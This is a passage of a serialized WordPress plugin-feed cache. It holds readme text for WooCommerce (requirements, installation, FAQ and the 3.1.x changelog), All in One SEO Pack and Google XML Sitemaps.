4.1+</li>\n<li>WooCommerce 2.6 requires WordPress 4.4+</li>\n</ul>\n<p>Visit the <a href="https://docs.woocommerce.com/document/server-requirements/" rel="nofollow">WooCommerce server requirements documentation</a> for a detailed list of server requirements.</p>\n<h4>Automatic installation</h4>\n<p>Automatic installation is the easiest option as WordPress handles the file transfers itself and you don’t need to leave your web browser. To do an automatic install of WooCommerce, log in to your WordPress dashboard, navigate to the Plugins menu and click Add New.</p>\n<p>In the search field type “WooCommerce” and click Search Plugins. Once you’ve found our eCommerce plugin you can view details about it such as the point release, rating and description. Most importantly of course, you can install it by simply clicking “Install Now”.</p>\n<h4>Manual installation</h4>\n<p>The manual installation method involves downloading our eCommerce plugin and uploading it to your webserver via your favourite FTP application. The WordPress codex contains <a href="https://codex.wordpress.org/Managing_Plugins#Manual_Plugin_Installation" rel="nofollow">instructions on how to do this here</a>.</p>\n<h4>Updating</h4>\n<p>Automatic updates should work like a charm; as always though, ensure you backup your site just in case.</p>\n<p>If on the off-chance you do encounter issues with the shop/category pages after an update you simply need to flush the permalinks by going to WordPress &gt; Settings &gt; Permalinks and hitting &#8216;save&#8217;. That should return things to normal.</p>\n<h4>Dummy data</h4>\n<p>WooCommerce comes with some dummy data you can use to see how products look; either import dummy_data.xml via the <a href="https://wordpress.org/plugins/wordpress-importer/">WordPress importer</a> or use our <a href="https://woocommerce.com/products/product-csv-import-suite/" rel="nofollow">CSV Import Suite plugin</a> to import dummy_data.csv and dummy_data_variations.csv.</p>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<h4>Minimum Requirements</h4>\n<ul>\n<li>PHP version 5.2.4 or greater (PHP 5.6 or greater is recommended)</li>\n<li>MySQL version 5.0 or greater (MySQL 5.6 or greater is recommended)</li>\n<li>Some payment gateways require fsockopen support (for IPN access)</li>\n<li>WooCommerce 2.5 requires WordPress 4.1+</li>\n<li>WooCommerce 2.6 requires WordPress 4.4+</li>\n</ul>\n<p>Visit the <a href="https://docs.woocommerce.com/document/server-requirements/" rel="nofollow">WooCommerce server requirements documentation</a> for a detailed list of server requirements.</p>\n<h4>Automatic installation</h4>\n<p>Automatic installation is the easiest option as WordPress handles the file transfers itself and you don’t need to leave your web browser. To do an automatic install of WooCommerce, log in to your WordPress dashboard, navigate to the Plugins menu and click Add New.</p>\n<p>In the search field type “WooCommerce” and click Search Plugins. Once you’ve found our eCommerce plugin you can view details about it such as the point release, rating and description. Most importantly of course, you can install it by simply clicking “Install Now”.</p>\n<h4>Manual installation</h4>\n<p>The manual installation method involves downloading our eCommerce plugin and uploading it to your webserver via your favourite FTP application. The WordPress codex contains <a href="https://codex.wordpress.org/Managing_Plugins#Manual_Plugin_Installation" rel="nofollow">instructions on how to do this here</a>.</p>\n<h4>Updating</h4>\n<p>Automatic updates should work like a charm; as always though, ensure you backup your site just in case.</p>\n<p>If on the off-chance you do encounter issues with the shop/category pages after an update you simply need to flush the permalinks by going to WordPress &gt; Settings &gt; Permalinks and hitting &#8216;save&#8217;. That should return things to normal.</p>\n<h4>Dummy data</h4>\n<p>WooCommerce comes with some dummy data you can use to see how products look; either import dummy_data.xml via the <a href="https://wordpress.org/plugins/wordpress-importer/">WordPress importer</a> or use our <a href="https://woocommerce.com/products/product-csv-import-suite/" rel="nofollow">CSV Import Suite plugin</a> to import dummy_data.csv and dummy_data_variations.csv.</p>\n</dd>\n<dt>Where can I find WooCommerce documentation and user guides?</dt>\n<dd>\n<p>For help setting up and configuring WooCommerce please refer to our <a href="https://docs.woocommerce.com/documentation/plugins/woocommerce/getting-started/" rel="nofollow">user guide</a></p>\n<p>For extending or theming WooCommerce, see our <a href="https://docs.woocommerce.com/documentation/plugins/woocommerce/woocommerce-codex/" rel="nofollow">codex</a>.</p>\n</dd>\n<dt>Where can I get support or talk to other users?</dt>\n<dd>\n<p>If you get stuck, you can ask for help in the <a href="https://wordpress.org/support/plugin/woocommerce" rel="nofollow">WooCommerce Plugin Forum</a>.</p>\n<p>For help with premium extensions from WooThemes, use <a href="https://support.woothemes.com/" rel="nofollow">our helpdesk</a>.</p>\n</dd>\n<dt>Will WooCommerce work with my theme?</dt>\n<dd>\n<p>Yes; WooCommerce will work with any theme, but may require some styling to make it match nicely. Please see our <a href="https://docs.woocommerce.com/documentation/plugins/woocommerce/woocommerce-codex/" rel="nofollow">codex</a> for help. If you&#8217;re looking for a theme with built in WooCommerce integration we recommend <a href="https://woocommerce.com/storefront/" rel="nofollow">Storefront</a>.</p>\n</dd>\n<dt>Where can I request new features, eCommerce themes and extensions?</dt>\n<dd>\n<p>You can vote on and request new features and extensions in our <a href="http://ideas.woothemes.com/forums/133476-woocommerce" rel="nofollow">WooIdeas board</a></p>\n</dd>\n<dt>Where can I report bugs or contribute to the project?</dt>\n<dd>\n<p>Bugs can be reported either in our support forum or preferably on the <a href="https://github.com/woocommerce/woocommerce/issues" rel="nofollow">WooCommerce GitHub repository</a>.</p>\n</dd>\n<dt>Where can I find the REST API documentation?</dt>\n<dd>\n<p>You can find the documentation of our REST API on the <a href="https://woocommerce.github.io/woocommerce-rest-api-docs/" rel="nofollow">WooCommerce REST API Docs</a>.</p>\n</dd>\n<dt>WooCommerce is awesome! Can I contribute?</dt>\n<dd>\n<p>Yes you can! Join in on our <a href="http://github.com/woocommerce/woocommerce/" rel="nofollow">GitHub repository</a> <img src="https://s.w.org/images/core/emoji/2.3/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<h4>3.1.2 &#8211; 2017-08-15</h4>\n<ul>\n<li>Fix &#8211; Importer: Prevent multiple placeholders being created when mixing IDs and SKUs.</li>\n<li>Fix &#8211; Importer: correctly set stock management props.</li>\n<li>Fix &#8211; Importer: Allow &#8220;unfiltered_html&#8221; for name, description and short description fields.</li>\n<li>Fix &#8211; Fix filename image handling.</li>\n<li>Fix &#8211; Rest API: Allow OPTIONS requests.</li>\n<li>Fix &#8211; Fixed missing reviews in product_page shortcode when querying by SKU.</li>\n<li>Fix &#8211; Don&#8217;t subtract negative taxes in net sales report.</li>\n<li>Fix &#8211; Sort by order + zone ID as a fallback in shipping zones so the zones always match in the same order.</li>\n<li>Fix &#8211; Corrected subject and heading in customer refunded email.</li>\n<li>Fix &#8211; Corrected handling of custom checkbox fields in checkout get_posted_data method.</li>\n<li>Fix &#8211; Fix admin help videos async property.</li>\n<li>Fix &#8211; Fixed price filters by introducing precision.</li>\n<li>Fix &#8211; Improved customer IP address detection.</li>\n<li>Fix &#8211; Fix dark theme readability.</li>\n<li>Fix &#8211; CLI tools command.</li>\n<li>Fix &#8211; Adjusted shop manager role to prevent unfiltered HTML being used.</li>\n<li>Fix &#8211; Various notices/warnings.</li>\n<li>Dev &#8211; Correctly invalidate cache after saving order items.</li>\n<li>Dev &#8211; Added <code>woocommerce_data_store_wp_{$this-&gt;meta_type}_read_meta</code> filter.</li>\n</ul>\n<h4>3.1.1 &#8211; 2017-07-11</h4>\n<ul>\n<li>Fix &#8211; Product importer: fixed handling of non UTF8 characters in descriptions.</li>\n<li>Fix &#8211; Product importer: Allow times in date fields.</li>\n<li>Fix &#8211; Product exporter: fixed meta data checkbox option.</li>\n<li>Fix &#8211; Helper: Styling and connect button in non-english languages.</li>\n<li>Fix &#8211; Tweak terms and conditions template to check for disallowed shortcodes.</li>\n<li>Fix &#8211; Fixed order helper queries when before_date and after_date args are both, corrected use of &#8220;paged&#8221;, and corrected use of filters.</li>\n<li>Fix &#8211; Gallery; Trigger resize after main image loads to ensure correct gallery size.</li>\n<li>Fix &#8211; Prevent extra slashes being added to meta values when using the CRUD.</li>\n<li>Fix &#8211; Appends &#8220;where&#8221; clauses in the comment feed to prevent a notice.</li>\n<li>Fix &#8211; Fixed structured data output for variable product prices.</li>\n<li>Fix &#8211; 3.x issue: Changed state validation logic to work for MX states.</li>\n<li>Fix &#8211; 3.x issue: 7day reports should start from midnight, not the current time.</li>\n<li>Fix &#8211; 3.x issue: Status changes made by admin should be marked as a manual in the order notes.</li>\n<li>Fix &#8211; 3.x issue: Allow unsetting product shipping class in REST API.</li>\n<li>Fix &#8211; 3.x issue: Corrected error handling in zones shippingMethodView.</li>\n<li>Tweak &#8211; Avoid CloudFlare email obfuscation in admin.</li>\n<li>Tweak &#8211; Improved detection of DOING_AUTOSAVE in admin meta box code.</li>\n<li>Tweak &#8211; Improved my-account redirects and fallbacks.</li>\n<li>Tweak &#8211; Add <code>cart_subtotal</code> to the shipping package so prices are recalculated when needed.</li>\n<li>Dev &#8211; Add search_customers() filter in customer data store.</li>\n<li>Dev &#8211; Product exporter: woocommerce_product_export_skip_meta_keys filter to control what gets exported.</li>\n<li>Dev &#8211; Pass correct value to woocommerce_shipping_classes_save_class when inserting a new term</li>\n</ul>\n<h4>3.1.0 &#8211; 2017-06-28</h4>\n<ul>\n<li>Feature &#8211; Built-in product CSV importer and exporter for products.</li>\n<li>Feature &#8211; Display (toggle-able) terms inline on the checkout rather than showing a link.</li>\n<li>Feature &#8211; On the &#8220;pay for order&#8221; page, if logged out show a login form rather than an error message.</li>\n<li>Feature &#8211; Enabled oembed support for product short descriptions.</li>\n<li>Feature &#8211; Added bulk variation update for stock status.</li>\n<li>Feature &#8211; On customer profiles: added a button to copy billing address to shipping address.</li>\n<li>Feature &#8211; Setup Wizard &#8211; Automatic Shipping Zone Creation In Setup Wizard for the base location.</li>\n<li>Feature &#8211; Setup Wizard &#8211; Added a new optional Storefront Theme step if you&#8217;re using a non-WooCommerce compatible theme.</li>\n<li>Feature &#8211; Made it possible to manage extension licenses purchased from WooCommerce.com on the extensions screen.</li>\n<li>Tweak &#8211; Gallery &#8211; Added a data-caption for captions to support both captions and titles for SEO.</li>\n<li>Tweak &#8211; Gallery &#8211; Used smoothHeight setting to better support images of different heights.</li>\n<li>Tweak &#8211; UI &#8211; Added blank states for API keys &amp; webhooks.</li>\n<li>Tweak &#8211; UI &#8211; Made Product submenu labels consistent in admin.</li>\n<li>Tweak &#8211; UI &#8211; Changed street address field label and placeholder to minimize user error on checkout.</li>\n<li>Tweak &#8211; UI &#8211; Added a confirmation before deleting log files.</li>\n<li>Tweak &#8211; If prices are the same for all variations, use price not priceSpecification in structured data.</li>\n<li>Tweak &#8211; Added variable so shipping calculator is shown on first row only when showing multiple shipping packages.</li>\n<li>Tweak &#8211; Updated mini-cart HTML to use a list.</li>\n<li>Tweak &#8211; Allow linking to single product additional_information tab from url hash.</li>\n<li>Tweak &#8211; Re-included WooCommerce endpoints on the appearance &gt; menus screens.</li>\n<li>Tweak &#8211; Always sync incorrect titles on variation read regardless of version.</li>\n<li>Tweak &#8211; Standardize rating HTML in all templates.</li>\n<li>Tweak &#8211; When searching, disable WC sort order so results are sorted by relevance.</li>\n<li>Tweak &#8211; Update price sorting code to use min or max for variable products depending on sorting direction.</li>\n<li>Tweak &#8211; Utilize $product method to get thumbnail in loops.</li>\n<li>Tweak &#8211; Check for an existing display name before updating a user on checkout. Adds display_name prop to the CRUD.</li>\n<li>Tweak &#8211; Adapt variable product price used in sorting based on direction of sort.</li>\n<li>Tweak &#8211; Made state validation less strict for keys.</li>\n<li>Tweak &#8211; For COD orders, force payment complete status to be completed.</li>\n<li>Fix &#8211; Use get_max_purchase_quantity in cart template and fix logic when stock management is off.</li>\n<li>Fix &#8211; Added log_id as the secondary sorting column to log list so log entries sort correctly.</li>\n<li>Fix &#8211; Fix shop page when using shop base and UTF8 shop page slug.</li>\n<li>Fix &#8211; Added handles so drag and drop does not break edit on mobile when sorting categories.</li>\n<li>Fix &#8211; Added ABSPATH checks to all files.</li>\n<li>Fix &#8211; Fixed how to flush rewrite rules after saving the shop main page.</li>\n<li>Fix &#8211; Emails sent via admin should switch to global locale.</li>\n<li>Fix &#8211; Set and restore wp_query so product page functions think it&#8217;s a real product page.</li>\n<li>Fix &#8211; Variation default value of &#8216;0&#8217; fails to save on product.</li>\n<li>Fix &#8211; Prevent locations being added to the &#8220;Rest Of The World&#8221; shipping zone via the API.</li>\n<li>Dev &#8211; Allow date created to be set in wc_create_refund.</li>\n<li>Dev &#8211; Introduced a <a href="https://github.com/woocommerce/woocommerce/wiki/wc_get_orders-and-WC_Order_Query" rel="nofollow">WC_Order_Query class</a> for finding/searching orders.</li>\n<li>Dev &#8211; Added &#8220;restored&#8221; webhook.</li>\n<li>Dev &#8211; Support floats for the custom attribute name sorting function.</li>\n<li>Dev &#8211; Updated Emogrifier to version 1.2.</li>\n<li>Dev &#8211; Sort product data tabs by priority in admin screen.</li>\n<li>Dev &#8211; Added new hooks for: dashboard reviews widget, product and category sorting events, woocommerce_add_to_cart_sold_individually_found_in_cart, cart empty messages.</li>\n<li>Dev &#8211; Added filters for zoom / flexslider / photoswipe enabling.</li>\n<li>Dev &#8211; Added filter for cookie name.</li>\n<li>Dev &#8211; Added ability to filter Photoswipe lightbox options.</li>\n<li>Dev &#8211; Added new filter for product thumbnail size.</li>\n<li>Dev &#8211; Added action for displaying custom data for fees in admin.</li>\n<li>Dev &#8211; Changed build_payload from private to public in webhook system.</li>\n<li>Dev &#8211; Added deprecated notice to WC_Order_Item_Meta (deprecated in 3.0).</li>\n<li>Dev &#8211; Added namespace to jQuery events that are removed in VariationForm.</li>\n<li>Dev &#8211; Made WC_Checkout::get_posted_data() public.</li>\n<li>Dev &#8211; Add custom message for custom system status tools.</li>\n<li>Dev &#8211; Added filters to change which order items are created and loaded to support custom item types.</li>\n<li>Dev &#8211; Updated jQuery payment and serializejson libraries.</li>\n<li>Localization &#8211; Added Bolivian states.</li>\n<li>Localization &#8211; Use VAT for Norway instead of Tax.</li>\n</ul>\n<p><a href="https://raw.githubusercontent.com/woocommerce/woocommerce/master/CHANGELOG.txt" rel="nofollow">See changelog for all versions</a>.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:47:"https://wordpress.org/plugins/woocommerce/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:6;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n		\n		\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:19:"All in One SEO Pack";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:50:"https://wordpress.org/plugins/all-in-one-seo-pack/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:58:"https://wordpress.org/plugins/all-in-one-seo-pack/#respond";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 30 Mar 2007 19:30:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:53:"https://wordpress.org/plugins-wp/all-in-one-seo-pack/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:83:"The original SEO plugin for WordPress, downloaded over 30,000,000 times since 2007.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"uberdose";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:4934:"<p><!--section=description--></p>\n<p>Use <strong>All in One SEO Pack</strong> to optimize your WordPress site for SEO. It&#8217;s easy and works out of the box for beginners, and has advanced features and an API for developers.</p>\n<p><strong><a href="http://semperplugins.com/plugins/all-in-one-seo-pack-pro-version/?loc=readme_utpv" rel="nofollow">Upgrade to Pro Version</a></strong></p>\n<p><a href="http://semperplugins.com/support/?loc=readme_ps" rel="nofollow">Premium Support</a></p>\n<p>First created in 2007, see why AIOSEO is one of the all time most downloaded plugins for WordPress.</p>\n<ul>\n<li>XML Sitemap support &#8211; submit your sitemap to Google and Bing and improve your SEO</li>\n<li>Google AMP support (Accelerated Mobile Pages)</li>\n<li>Google Analytics support</li>\n<li>Support for SEO on Custom Post Types</li>\n<li>Advanced Canonical URLs</li>\n<li>Redirect attachment pages to parent post</li>\n<li>Automatically notifies search engines like Google and Bing about changes to your site</li>\n<li>Built-in API so other plugins/themes can access and extend functionality</li>\n<li>ONLY free plugin to provide SEO Integration for e-Commerce sites, including WooCommerce</li>\n<li>Nonce Security built into All in One SEO Pack</li>\n<li>Automatically optimizes your <strong>titles</strong> for Google and other search engines</li>\n<li>Generates <strong>META tags automatically</strong></li>\n<li>Avoids the typical duplicate content found on WordPress blogs</li>\n<li>For beginners, you don&#8217;t even have to look at the options, it works out-of-the-box. Just install.</li>\n<li>For advanced users, you can fine-tune everything to optimize your SEO</li>\n<li>You can override any title and set any META description and any META keywords you want.</li>\n<li>Compatibility with many other plugins</li>\n<li>Translated into 57 languages</li>\n<li>PHP 7 100% Compatible</li>\n</ul>\n<p>Follow me on Twitter to keep up with the latest updates <a href="http://twitter.com/michaeltorbert/" rel="nofollow">Michael<br />\nTorbert</a></p>\n<p><iframe class=\'youtube-player\' type=\'text/html\' width=\'640\' height=\'390\' src=\'https://www.youtube.com/embed/46MR4FboMaA?version=3&#038;rel=1&#038;fs=1&#038;autohide=2&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent\' allowfullscreen=\'true\' style=\'border:0;\'></iframe></p>\n<h4>Tags</h4>\n<p>seo, SEO, All in One, google, meta, meta description, search engine optimization, xml sitemap, xml sitemaps, google sitemap, sitemap, sitemaps, robots meta, rss, rss footer, yahoo, bing, widget, Post, plugin, admin, posts, shortcode, sidebar, twitter, page, images, comments, image, news sitemaps, XML News Sitemaps, WordPress SEO, multisite, canonical, nofollow, noindex, keywords, meta keywords, description, webmaster tools, google webmaster tools, seo pack, schema.org, search engines, custom post types, custom taxonomies, canonical</p>\n<p><!--section=faq--></p>\n<p>Please visit our complete <strong><a href="http://semperplugins.com/documentation/" rel="nofollow">Documentation</a></strong> before requesting support for SEO from the<br />\n<strong><a href="http://semperplugins.com/support/" rel="nofollow">All in One SEO Pack Support Forum</a></strong></p>\n<p><a href="http://semperfiwebdesign.com/documentation/all-in-one-seo-pack/translations-for-all-in-one-seo-pack/" rel="nofollow">Translations</a></p>\n<dl>\n<dt>General Settings</dt>\n<dd>\n<p><iframe class=\'youtube-player\' type=\'text/html\' width=\'640\' height=\'390\' src=\'https://www.youtube.com/embed/uGt6CVbA5bI?version=3&#038;rel=1&#038;fs=1&#038;autohide=2&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent\' allowfullscreen=\'true\' style=\'border:0;\'></iframe></p>\n</dd>\n<dt>XML Sitemaps</dt>\n<dd>\n<p><iframe class=\'youtube-player\' type=\'text/html\' width=\'640\' height=\'390\' src=\'https://www.youtube.com/embed/zvNU92Low8A?version=3&#038;rel=1&#038;fs=1&#038;autohide=2&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent\' allowfullscreen=\'true\' style=\'border:0;\'></iframe></p>\n</dd>\n<dt>Social Meta</dt>\n<dd>\n<p><iframe class=\'youtube-player\' type=\'text/html\' width=\'640\' height=\'390\' src=\'https://www.youtube.com/embed/Dfe49FiiAog?version=3&#038;rel=1&#038;fs=1&#038;autohide=2&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent\' allowfullscreen=\'true\' style=\'border:0;\'></iframe></p>\n</dd>\n<dt>Performance</dt>\n<dd>\n<p><iframe class=\'youtube-player\' type=\'text/html\' width=\'640\' height=\'390\' src=\'https://www.youtube.com/embed/A0VKinM5s00?version=3&#038;rel=1&#038;fs=1&#038;autohide=2&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent\' allowfullscreen=\'true\' style=\'border:0;\'></iframe></p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<p>All in One SEO Pack <a href="http://semperfiwebdesign.com/documentation/all-in-one-seo-pack/all-in-one-seo-pack-release-history/" rel="nofollow">Changelog</a></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:55:"https://wordpress.org/plugins/all-in-one-seo-pack/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:7;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n		\n		\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:19:"Google XML Sitemaps";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:55:"https://wordpress.org/plugins/google-sitemap-generator/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:63:"https://wordpress.org/plugins/google-sitemap-generator/#respond";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 16 Jun 2005 09:33:19 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:58:"https://wordpress.org/plugins-wp/google-sitemap-generator/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:94:"This plugin will improve SEO by helping search enginess better index your site using sitemaps.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:14:"Arne Brachhold";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:27964:"<p><!--section=description--></p>\n<p>Use this plugin to greatly improve SEO to create special XML sitemaps which will help search engines like Google, Bing, Yahoo and Ask.com to better index your site.</p>\n<p>With such a sitemap, it&#8217;s much easier for the crawlers to see the complete structure of your site and retrieve it more efficiently. The plugin supports all kinds of WordPress generated pages as well as custom URLs. Additionally it notifies all major search engines every time you create a post about the new content.</p>\n<p>Supported since <em>over 9 years</em> and rated as the <a href="https://wordpress.org/plugins/browse/top-rated/">best WordPress plugin</a>, it will do exactly what it&#8217;s supposed to do &#8211; providing a complete XML sitemap for search engines. It will not break your site, slow it down or annoy you. Guaranteed!</p>\n<blockquote>\n<p>If you like the plugin, feel free to rate it (on the right side of this page)! <img src="https://s.w.org/images/core/emoji/2.3/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>\n</blockquote>\n<p>Related Links:</p>\n<ul>\n<li><a href="http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/" title="Google XML Sitemaps Plugin for WordPress" rel="nofollow">Plugin Homepage</a></li>\n<li><a href="http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/changelog/" title="Changelog of the Google XML Sitemaps Plugin for WordPress" rel="nofollow">Changelog</a></li>\n<li><a href="http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/help/" title="Google Sitemaps FAQ" rel="nofollow">Plugin help and sitemaps FAQ</a></li>\n<li><a href="https://wordpress.org/support/topic/read-before-opening-a-new-support-topic" rel="nofollow">Support Forum</a></li>\n</ul>\n<h3>License</h3>\n<p>Good news, this plugin is free for everyone! Since it&#8217;s released under the GPL, you can use it free of charge on your personal or commercial site.</p>\n<h3>Translations</h3>\n<p>The plugin comes with various translations, please refer to the <a href="https://codex.wordpress.org/Installing_WordPress_in_Your_Language" title="Installing WordPress in Your Language" rel="nofollow">WordPress Codex</a> for more information about activating the translation. If you want to help to translate the plugin to your language, please have a look at the sitemap.pot file which contains all definitions and may be used with a <a href="http://www.gnu.org/software/gettext/" rel="nofollow">gettext</a> editor like <a href="http://www.poedit.net/" rel="nofollow">Poedit</a> (Windows).</p>\n<p><!--section=installation--></p>\n<ol>\n<li>Install the plugin like you always install plugins, either by uploading it via FTP or by using the &#8220;Add Plugin&#8221; function of WordPress.</li>\n<li>Activate the plugin at the plugin administration page</li>\n<li>If you want: Open the plugin configuration page, which is located under Settings -&gt; XML-Sitemap and customize settings like priorities and change frequencies.</li>\n<li>The plugin will automatically update your sitemap of you publish a post, so there is nothing more to do <img src="https://s.w.org/images/core/emoji/2.3/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></li>\n</ol>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Install the plugin like you always install plugins, either by uploading it via FTP or by using the &#8220;Add Plugin&#8221; function of WordPress.</li>\n<li>Activate the plugin at the plugin administration page</li>\n<li>If you want: Open the plugin configuration page, which is located under Settings -&gt; XML-Sitemap and customize settings like priorities and change frequencies.</li>\n<li>The plugin will automatically update your sitemap of you publish a post, so there is nothing more to do <img src="https://s.w.org/images/core/emoji/2.3/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></li>\n</ol>\n</dd>\n<dt>Where can I find the options page of the plugin?</dt>\n<dd>\n<p>It is under Settings &gt; XML Sitemap. I know nowadays many plugins add top-level menu items, but in most of the cases it is just not necessary. I&#8217;ve seen WP installations which looked like an Internet Explorer ten years ago with 20 toolbars installed. <img src="https://s.w.org/images/core/emoji/2.3/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>\n</dd>\n<dt>Do I have to create a sitemap.xml and sitemap.xml.gz by myself?</dt>\n<dd>\n<p>Not anymore. Since version 4, these files are dynamically generated. <em>There must be no sitemap.xml or sitemap.xml.gz in your site directory anymore!</em> The plugin will try to rename them to sitemap.xml.bak if they still exists.</p>\n</dd>\n<dt>Does this plugin use static files or &#8220;I can&#8217;t find the sitemap.xml file!&#8221;</dt>\n<dd>\n<p>Not anymore. Since version 4, these files are dynamically generated just like any other WordPress content.</p>\n</dd>\n<dt>There are no comments yet (or I&#8217;ve disabled them) and all my postings have a priority of zero!</dt>\n<dd>\n<p>Please disable automatic priority calculation and define a static priority for posts.</p>\n</dd>\n<dt>So many configuration options&#8230; Do I need to change them?</dt>\n<dd>\n<p>No, only if you want to. Default values are ok for most sites.</p>\n</dd>\n<dt>Does this plugin work with all WordPress versions?</dt>\n<dd>\n<p>This version works with WordPress 3.3 and better. If you&#8217;re using an older version, please check the <a href="http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/" title="Google (XML) Sitemap Generator Plugin Homepage" rel="nofollow">Google Sitemaps Plugin Homepage</a> for the legacy releases. There is a working release for every WordPress version since 1.5, but you really should consider updating your WordPress installation!</p>\n</dd>\n<dt>My question isn&#8217;t answered here</dt>\n<dd>\n<p>Most of the plugin options are described at the <a href="http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/" rel="nofollow">plugin homepage</a> as well as the dedicated <a 